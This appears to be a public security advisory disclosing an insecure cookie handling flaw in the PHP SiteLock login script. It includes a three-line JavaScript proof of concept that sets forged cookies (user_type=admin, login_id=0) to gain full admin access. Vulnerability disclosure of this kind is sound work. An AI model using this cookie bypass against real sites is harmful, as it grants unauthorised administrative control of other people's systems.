php-siteLock-exploit.txt - advisories - Security advisories that I have released to the public.
(HTM) git clone git://jay.scot/advisories
(DIR) Log
(DIR) Files
(DIR) Refs
(DIR) README
---
php-siteLock-exploit.txt (1287B)
---
1
2
3 PHP SiteLock
4 Insecure Cookie Handling
5 ===========================
6
7
8
9
10 SUMMARY
11 ________
12
13 PHP Site Lock: A highly secure website login script which has
14 features like User Authentication & Management, Website
15 Password Protection , protection of pdf , images , etc.
16
17
18
19 IMPACT
20 _______
21
22 Leads to full administration rights of the admin panel.
23
24
25
26 VERSIONS
27 _________
28
29 Vulnerable systems: All versions
30
31 Immune systems: None
32
33
34
35 DESCRIPTION #1
36 ______________
37
38 Insecure cookie handling allows anyone to simply create a custom cookie
39 with the values below. This will allow full access to the admin panel.
40
41 Name - user_type
42 Content - admin
43 Path - /
44
45 Name - login_name
46 Content - admin
47 Path - /
48
49 Name - login_id
50 Content - 0
51 Path - /
52
53
54 Proof of Concept:
55 -> javascript:document.cookie="user_type=admin; path=/"
56 -> javascript:document.cookie="login_name=admin; path=/"
57 -> javascript:document.cookie="login_id=0; path=/"
58
59 Fix:
60 -> None given.
61
62
63
64 ADDITIONAL INFO
65 _______________
66
67
68 Vendor URL - www.phpsitelock.com
69 Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
70 Credit - Jay Scott
71 Message History - Vendor Contacted.
72 No reply after 30 days
73
74